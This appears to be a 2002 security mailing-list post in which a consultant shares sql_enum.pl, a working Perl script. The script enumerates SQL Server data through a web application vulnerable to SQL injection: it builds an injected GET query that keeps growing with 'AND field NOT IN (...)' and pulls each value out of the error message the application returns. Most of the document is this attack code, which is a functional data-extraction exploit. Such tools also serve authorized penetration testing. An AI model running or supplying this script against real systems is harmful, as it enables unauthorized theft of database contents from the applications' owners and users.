Hi,

Attached is a simple Perl script that enumerates the values of a field, column or
table from a SQL server through a web application that is vulnerable to SQL
injection: it reads each value back out of the database error message the
application returns. It works via GET requests; adapting it for POST should be
trivial. The only prerequisites are the vulnerable application's URL and an
initial query.

Is anyone aware of an existing SQL injection scanner? I am planning to write
one (only if I have the time :) -- I'm actually an IDS jockey), but would
like to know whether a free one already exists.

Cheers,

--mel 
Security Consultant, Intrusion Detection System
SCAN Associates Sdn. Bhd.
#!/usr/bin/perl -w

# sql_enum.pl
# [EMAIL PROTECTED] 16/Apr/2002
# a simple script that automatically enumerates a SQL database through an
# injectable web application, harvesting one value per request from the
# database error message the application echoes back
# greetz: scanners and skripkiddiotz

use Getopt::Std;
use IO::Socket;
use Socket qw(PF_INET SOCK_STREAM sockaddr_in);

# Version string shown by usage().  $request holds the raw HTTP request that
# is about to go out and $qry the injected query it is built from; both are
# file-level lexicals that the main loop below keeps updating.
my $VERSION = "0.1";
my ($request, $qry) = ("", "");

# Print the command-line synopsis to STDERR and terminate with exit status
# 255.  The text interpolates the script name ($0) and $VERSION; the
# leading blank line is intentional.
sub usage {
        print STDERR <<"USAGE";

--$0 v$VERSION--
Usage: $0 -t <target> -f <file> -F <field_nam> [options] where options are:
        -p = <proxy's IP> 
        -P = <proxy port> 
        -l = <log file - output result here> 
        -c = <continue from last query>
USAGE
        exit 255;
}

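# ---- command-line handling -------------------------------------------------
# -t  target host: used for the Host: header and, when no proxy is given,
#     as the host the TCP connection goes to (port 80)
# -f  file whose LAST line is the initial request path/query
# -F  name of the field to enumerate
# -p / -P  HTTP proxy host and port (both or neither)
# -l  log file, opened in append mode as LOGFILE
# -c  resume: do not append the "AND <field> NOT IN (" suffix to the
#     initial query (the file is expected to already end with it)
my %args;
getopts("t:f:F:p:P:l:c", \%args) or usage();

if (!$args{t}) { die "No target specified\n"; }
if (!$args{f}) { die "No file specified\n"; }
if (!$args{F}) { die "No field name specified\n"; }

# A proxy needs both host and port; either one alone is an error.
if ($args{p} && !$args{P}) { die "\nPlease specify the proxy port!\n"; }
if (!$args{p} && $args{P}) { die "\nNo proxy IP is specified!\n"; }

# Where send_query() actually connects: the proxy if one was given, else the
# target itself on port 80.  $proxy_ip must be the PACKED 4-byte address
# (scalar gethostbyname), because send_query() hands it straight to
# connect().  Storing the raw -t string here, as the code used to do, can
# never yield a valid address, so the no-proxy path could not connect.
my $proxy_ip = "";
my $proxy_port = "";
if ($args{p} && $args{P}) {
        $proxy_ip = gethostbyname($args{p});
        defined $proxy_ip or die "Can't resolve the proxy!\n";
        $proxy_port = $args{P};
} else {
        $proxy_ip = gethostbyname($args{t});
        defined $proxy_ip or die "Can't resolve the target!\n";
        $proxy_port = "80";
}

my $file   = $args{f};
my $target = $args{t};
my $field  = $args{F};
my $lfile  = $args{l};

# Three-argument open: with the two-argument form a file name beginning
# with '>' or '|' would change the open mode or run a command.
open(my $qfh, '<', $file) or die "Can't open $file!\n";
# LOGFILE stays a bareword handle because the rest of the script prints to it.
if ($lfile) { open(LOGFILE, '>>', $lfile) or die "Can't create file\n"; }

# Only the last line of the file is kept; it becomes the initial query and
# is sent verbatim on the GET request line.  Multiple targets are not
# supported.
while (my $line = <$qfh>) { chomp $line; $qry = $line; }
close($qfh);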

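# Send one raw HTTP request to $proxy_ip:$proxy_port and extract the
# enumerated value from the database error the application echoes back.
#
# Argument: the complete request text (headers included).
# Returns:
#   - the quoted value captured from a response that contains
#     "Syntax error" and matches "value '<x>' to";
#   - the sentinel "31337" when the response contains "Syntax error" but
#     no such value -- the main loop treats this as "nothing left";
# Dies when the connection fails or the response contains no "Syntax error"
# at all (unexpected page); in the latter case the request and response are
# appended to LOGFILE first, if -l opened it.
#
# NOTE: the response body is server-controlled and is printed and logged
# raw -- treat terminal output and the log file as untrusted content.
sub send_query
{
        my $request = shift @_;
        my $result = "";
        my $data = "";

        select(STDOUT); $| = 1;     # progress output unbuffered

        socket(my $sock, PF_INET, SOCK_STREAM, getprotobyname('tcp') || 0)
                or die "Socket\n";
        # Autoflush the socket as well; select() returns the previously
        # selected handle, so this one-liner leaves STDOUT selected.
        select((select($sock), $| = 1)[0]);

        # sockaddr_in() builds the address for the local OS layout; the
        # former hand-packed "SnA4x8" assumed one particular sockaddr_in
        # layout and is not portable.
        connect($sock, sockaddr_in($proxy_port, $proxy_ip))
                or do { close($sock); die "connection problems\n"; };

        print $sock $request;
        sleep 1;                   # presumably lets the request go out before the half-close
        shutdown($sock, 1);        # done writing; the server's EOF ends the read loop
        while (my $chunk = <$sock>) {
                $data .= $chunk;
        }
        close($sock);

        if ($data !~ /Syntax error/) {
                # Not the error page the enumeration relies on: record what
                # was sent and what came back, then stop.
                if (defined fileno(LOGFILE)) {
                        print LOGFILE "Last request sent was:\n\n";
                        print LOGFILE "$request\n\n";
                        print LOGFILE "The enumerator encoutered the ";
                        print LOGFILE "error\n\n";
                        print LOGFILE $data;
                } else {
                        warn "Unexpected response (no 'Syntax error' in body); rerun with -l to log it\n";
                }
                die("An error occured\n");
        }

        # The quoted value inside "value '<x>' to" is the enumerated result.
        if ($data =~ /value\s+(\'\S*\')\s+to/) {
                $result = $1;
        } else {
                print "Error: $data\n\n";
                $result = "31337";
        }
        return $result;
}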

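# Build the raw HTTP/1.1 GET for the current injected query.  "--" is
# appended after the query (SQL line-comment marker, presumably to neutralise
# whatever the application appends after the injection point).
# "Connection: close" is required because send_query() reads the response
# until EOF; a keep-alive server honouring the HTTP/1.1 default would leave
# it hanging.
sub build_request {
        my ($query, $host) = @_;
        return "GET $query-- HTTP/1.1\r\n"
             . "Host: $host\r\n"
             . "Accept: */*\r\n"
             . "Connection: close\r\n"
             . "\r\n";
}

# The first request is the query exactly as read from the file; it is
# expected to yield the first value.
$request = build_request($qry, $target);

# Every later query carries "AND <field> NOT IN (<values seen so far>)".
# With -c the file's last line is assumed to already end with that suffix.
if (!$args{c}) {
        $qry .= "%20AND%20$field%20NOT%20IN%20(";
}

print "Sending first query: $request\n\n";

my $i = 0;
my $res = "";

# send_query() returns "31337" once the error page stops yielding a value,
# which ends the enumeration.  The while condition is the ONLY place the
# request is sent: sending it again at the bottom of the loop would double
# the traffic and discard that answer.
while (($res = send_query($request)) ne "31337") {
        $i++;
        $qry .= "$res";

        print LOGFILE "[$i] $res\n" if $lfile;
        print "[$i] $res\n";

        # Re-close the parentheses so the query stays valid.  This string
        # surgery is kept verbatim -- it depends on exact statement order:
        # when a CONVERT(...) wrapper is present its "))" is removed and
        # three closers are appended after the list; otherwise a single ")"
        # closes the IN list.
        if ($qry =~ /convert/ or $qry =~ /CONVERT/) {
                $qry =~ s/\)\)//;
                $qry .= ")))";
        } else {
                $qry .= ")";
        }

        # The previous list end and the new value meet as "')'"; turning it
        # into "','" grows the IN list:  ('a')'b')  ->  ('a','b')
        $qry =~ s/\'\)\'/\'\,\'/;

        print "Sending query $i: $qry\n\n";

        $request = build_request($qry, $target);
}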
